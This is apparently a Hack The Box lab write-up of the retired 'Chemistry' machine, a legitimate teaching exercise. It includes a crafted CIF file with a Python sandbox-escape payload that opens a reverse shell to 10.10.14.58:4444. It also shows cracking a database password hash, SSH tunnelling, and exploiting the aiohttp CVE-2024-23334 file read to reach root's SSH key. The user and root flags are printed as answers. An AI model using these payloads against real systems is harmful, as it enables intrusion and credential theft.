Chemistry (Easy)

Description

  • Difficult -> Easy

  • OS -> Linux

  • State -> Retired

  • Tags -> Pending

https://app.hackthebox.com/machines/631

Write-up

  • I started doing an initial port scan using Nmap

nmap 10.129.92.228 -p- -Pn --min-rate 2500 -oN scan.txt

  • Then I did an exhaustive scan to learn more about the services running on the open ports

nmap 10.129.92.228 -p22,5000 -sVC -oN serv_scan.txt
snippet

  • I found the HTTP protocol running on port 5000, in this case, a Universal Plug and Play (UPNP) service that helps in network discovery. So to check it, I navigated to the direction using the browser, and there I found a simple site that seemed to be a program for processing files related to chemistry. I tried to register and log in, which sent me to a dashboard with an option to upload a Crystallographic Information File (CIF)

To learn more about the HTTP protocol you can go here

  • I didn't know about this type of file but the site also allowed me to download a sample file to check which parameters the page processed and the file format

  • As the web let me modify and reupload the file, it could lead to a possible File Upload vulnerability, so I could try to leverage it to gain a Reverse Shell from the server. To do so, I checked on the web for possible CVEs and exploits. In this process, I found an interesting repository with a vulnerability that affected the 2024.2.8 or lower versions and could help me gain RCE on the target

To learn more about File Upload exploitation you can go here

  • With this, I crafted a modified version of the CIF file to execute commands remotely. In that case, I modify it by adding a script to gain the Reverse Shell

exploit.cif
data_Example
_cell_length_a    10.00000
_cell_length_b    10.00000
_cell_length_c    10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta  90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
 _atom_site_label
 _atom_site_fract_x
 _atom_site_fract_y
 _atom_site_fract_z
 _atom_site_occupancy
 H 0.00000 0.00000 0.00000 1
 O 0.50000 0.50000 0.50000 1

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c \'sh -i >& /dev/tcp/10.10.14.58/4444 0>&1\'");0,0,0'
_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "

I used a custom payload for the reverse shell because some standard payloads didn't work, and the script had special characters that needed to be interpreted

  • After that, I uploaded the file to the system and set a Netcat listener in my machine to receive the connection. Then, I clicked the View button to run the internal script, observing the page kept loading and checking that the listener had caught the shell from the host. I also sanitized the terminal to work more comfortably and checked which user I was. having now access as the app user, the one from the web server

nc -nvlp 4444

To learn more about the sanitization process you can go here

  • Then I navigated through the system checking for a possible way to do lateral movement or privilege escalations. I found that in the /home folder there was a folder for another user named rosa. I listed the files under this directory and found a user.txt file, but when trying to read its content I didn't have the proper permissions

  • In these circumstances, I needed to do lateral movement to gain access as rosa. Searching for any clue about how to do it, I found that under the /home/app/instance folder (which contained files of the web service), there was a database.db file, and checking its type with the file command, I confirmed it was a SQLite3 database

  • Knowing this, I interacted with it and retrieved some information. I queried information about the tables and found a user table, and reading its information I found some users and values that could be hashes for passwords. I noticed in this case there was also a user rosa in this database so I could assume it was the system user and try to crack the hash to obtain the password

sqlite3 database.db
sqlite> .tables
sqlite> SELECT * FROM user;

  • To do that, I used the online tool Crackstation to recognize and break the hash, and I was lucky because it was a known MD5 hash that revealed the password unicorniosrosados

To learn more about MD5 or other hashes you can go here

  • Then, I tried to connect through SSH to the rosa user using this password and got in successfully. I also sanitized again the terminal to interact better with it

To learn more about the SSH protocol you can go here

  • With that, I had proper reading permissions to read the user.txt file in the /home/rosa folder and retrieved the user flag

cat user.txt

  • With that, I got the user flag

Answer: 4322e11a0bd69f9f5c49e46ce07b3f35

  • Then, I had to find a way to escalate privileges. I started searching but after a while, I didn't find anything. So to facilitate the process I tried using Linpeas to help me find possible paths for the escalation. After importing it and running it, in the results obtained, I found there was a service running locally on port 8080, which is normally used for some web servers

snippet

  • As it is locally deployed, I couldn't access the service directly through a browser, but as I had access to the system via SSH, I could try to make a tunnel via local port forwarding to access it from my machine. I did the tunneling process and to confirm it had worked, I accessed the service on the browser and observed the web service deployed correctly

ssh -L 7777:127.0.0.1:8080 rosa@10.129.92.228
snippet

  • I explored the site which seemed to be a statistics service, but after a while, I didn't find anything interesting, so I tried to retrieve information on the components. I used the curl command to send a petition and retrieve some information based on the headers of the response

curl http://localhost:7777 --head

  • I found the HTTP server was using the aiohttp python library to deploy the web content and its corresponding version. With this, I searched for some possible related CVEs, and after some research, I found a GitHub repository with a POC for the CVE-2024-23334 which exploited a Local File Inclusion vulnerability on versions 3.9.1 or lower of aiohttp to read files as the root user

https://github.com/wizarddos/CVE-2024-23334

To learn more about Local File Inclusion exploitation you can go here

  • I downloaded the exploit and used it to automatize the attack, but I needed to find a static route to execute the attack. With a little research, I found some standard folders for static files. I tried some of them in the exploit and noticed that using the /assets route it worked

snippet

  • Finally, as I was reading files as the root user, I tried accessing the /root folder and reading the content of the root.txt if existed, and with that, I luckily retrieved the root flag

  • With that, I got the root flag and pwned the machine

Answer: 861d48a12f6494bc174cca5585a3a3e1

Alternative Privilege Escalation

  • I could also escalate privileges by retrieving information on the SSH keys for the root user. I checked for them in the standard /.ssh folder using the default name id_rsa, and fortunately, the file existed and leaked the private key

  • With this, I copied the key into a local file and used it to access the target via SSH. With that done, I could go to the /root folder and read the root.txt file to retrieve the root flag

ssh root@10.129.92.228 -i id_rsa
snippet

To learn in detail about the abuse of SSH keys for privilege escalation you can go here

PreviousCrafty (Easy)NextHTB Challenges

Last updated